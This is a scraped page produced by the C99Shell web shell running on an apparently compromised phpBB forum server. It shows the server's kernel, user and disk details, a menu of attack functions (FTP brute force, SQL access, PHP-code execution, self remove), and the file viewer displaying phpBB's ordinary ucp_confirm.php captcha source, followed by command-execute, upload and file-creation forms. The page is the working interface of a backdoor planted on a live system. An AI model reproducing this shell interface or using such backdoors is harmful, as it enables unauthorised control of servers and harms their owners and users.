!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/phpbb3/install6/update/old/includes/ucp/   drwxrwxr-x
Free 83.3 GB of 96.73 GB (86.12%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ucp_confirm.php (1.63 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
*
* @package VC
* @version $Id: ucp_confirm.php 8655 2008-06-13 19:39:01Z acydburn $
* @copyright (c) 2005 phpBB Group
* @license http://opensource.org/licenses/gpl-license.php GNU Public License
*
*/

/**
* @ignore
*/
if (!defined('IN_PHPBB'))
{
    exit;
}

/**
* ucp_confirm
* Visual confirmation
*
* Note to potential users of this code ...
*
* Remember this is released under the _GPL_ and is subject
* to that licence. Do not incorporate this within software
* released or distributed in any way under a licence other
* than the GPL. We will be watching ... ;)
*
* @package VC
*/
class ucp_confirm
{
    var 
$u_action;

    function 
main($id$mode)
    {
        global 
$db$user$phpbb_root_path$config$phpEx;

        
// Do we have an id? No, then just exit
        
$confirm_id request_var('id''');
        
$type request_var('type'0);

        if (!
$confirm_id || !$type)
        {
            exit;
        }

        
// Try and grab code for this id and session
        
$sql 'SELECT code, seed
            FROM ' 
CONFIRM_TABLE "
            WHERE session_id = '" 
$db->sql_escape($user->session_id) . "'
                AND confirm_id = '" 
$db->sql_escape($confirm_id) . "'
                AND confirm_type = 
$type";
        
$result $db->sql_query($sql);
        
$row $db->sql_fetchrow($result);
        
$db->sql_freeresult($result);

        
// If we have a row then grab data else create a new id
        
if (!$row)
        {
            exit;
        }

        if (
$config['captcha_gd'])
        {
            include(
$phpbb_root_path 'includes/captcha/captcha_gd.' $phpEx);
        }
        else
        {
            include(
$phpbb_root_path 'includes/captcha/captcha_non_gd.' $phpEx);
        }

        
$captcha = new captcha();
        
$captcha->execute($row['code'], $row['seed']);

        
garbage_collection();
        
exit_handler();
    }
}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0041 ]--